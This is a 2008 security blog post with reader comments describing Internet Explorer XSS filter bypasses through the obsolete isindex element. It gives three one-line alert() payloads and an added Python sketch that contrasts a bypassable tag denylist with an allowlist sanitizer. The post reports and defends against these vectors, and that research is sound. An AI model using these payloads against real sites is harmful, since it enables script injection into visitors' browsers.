Yes, an XSS post again. I’m sorry.
I’ve been having fun testing some really good filters (some of the best in the business, IMO). I found a vector that isn’t on rsnake’s cheat sheet. Check it out:
Only works in IE
<isindex type=image src=1 onerror=alert(1)>
Because IE treats the isindex element (a very old HTML element) as an input tag, you can specify the same attributes and execute JavaScript.
Update…
Found another variation which is pretty cool:
<isindex action=javascript:alert(1) type=image>
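As an added illustration (not part of the original post), the filter-side view of this trick: a tag-name denylist lets the isindex vectors above straight through because it has never heard of the element, whereas an allowlist sanitizer that drops unknown elements, any on* handler and any URL attribute not starting with http(s) removes them. The vector strings are copied from the post; the denylist, allowlist and sample inputs are constructed for this example.

```python
import re
from html.parser import HTMLParser

# Vectors quoted from the post above (IE-only isindex trick).
VECTORS = [
    '<isindex type=image src=1 onerror=alert(1)>',
    '<isindex action=javascript:alert(1) type=image>',
    '<isindex type=image onerror=alert(1) src=>',
]

# Constructed tag-name denylist of the kind the vector slips past: isindex is not on it.
DENYLIST = {"script", "img", "input", "iframe", "object", "embed"}

def denylist_filter(html):
    """Returns True if a denylisted tag name appears (naive and bypassable)."""
    return any(re.search(r"<\s*%s\b" % t, html, re.I) for t in DENYLIST)

# Constructed allowlist: known elements, known attributes, http(s) URLs only.
ALLOWED = {"a": {"href", "title"}, "b": set(), "i": set(), "p": set(), "img": {"src", "alt"}}
URL_ATTRS = {"href", "src", "action"}

class AllowlistSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED:
            return  # unknown element (isindex included) is dropped entirely
        kept = []
        for name, value in attrs:
            value = value or ""
            if name not in ALLOWED[tag] or name.startswith("on"):
                continue  # unknown attribute or event handler: dropped
            if name in URL_ATTRS and not re.match(r"^https?://", value.strip(), re.I):
                continue  # javascript: and other schemes: dropped
            kept.append(' %s="%s"' % (name, value.replace('"', "&quot;")))
        self.out.append("<%s%s>" % (tag, "".join(kept)))
    def handle_endtag(self, tag):
        if tag in ALLOWED:
            self.out.append("</%s>" % tag)
    def handle_data(self, data):
        # Text nodes are re-escaped; the parser decoded entities for us.
        self.out.append(data.replace("&", "&amp;").replace("<", "&lt;").replace(">", "&gt;"))

def sanitize(html):
    """Returns html rebuilt from allowlisted elements and attributes only."""
    p = AllowlistSanitizer()
    p.feed(html)
    p.close()
    return "".join(p.out)
```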




Comments (8)

You can remove the value of the src attribute:
<isindex type=image onerror=alert(1) src=>
(only tested on IE6)
Did you ask rsnake to add this vector?
Posted 26 Aug 2008 at 9:16 pm

Also works in IE8
I’ll email him
Posted 26 Aug 2008 at 9:25 pm

Emailed rsnake, but they won’t be added to the cheat sheet because there is no new event handler and javascript: is already mentioned
Posted 26 Aug 2008 at 9:54 pm

Hi Gareth Heyes,
good job
Posted 27 Aug 2008 at 5:17 am

It works in IE6/7/8
If only everyone had the power of
ESAPI.encoder().encodeForHTMLAttribute(String userData);
Great find, good job!
Posted 27 Aug 2008 at 10:56 pm

@jim
Hey jim, thanks. Why don’t you put up an online demo of ESAPI like Mario’s smoketest? Then we’ll see how good it is.
Posted 28 Aug 2008 at 10:48 am

Hi,
I have an idea for protecting websites against XSS attacks. Why not ban all the tags, and allow only predefined ones with ‘special’ care? Like, allow img only with a src that starts with http://, or allow a href but only if http or https is found.
Posted 29 Aug 2008 at 7:51 am

Also works in IE8. thx
Posted 10 Nov 2008 at 11:53 am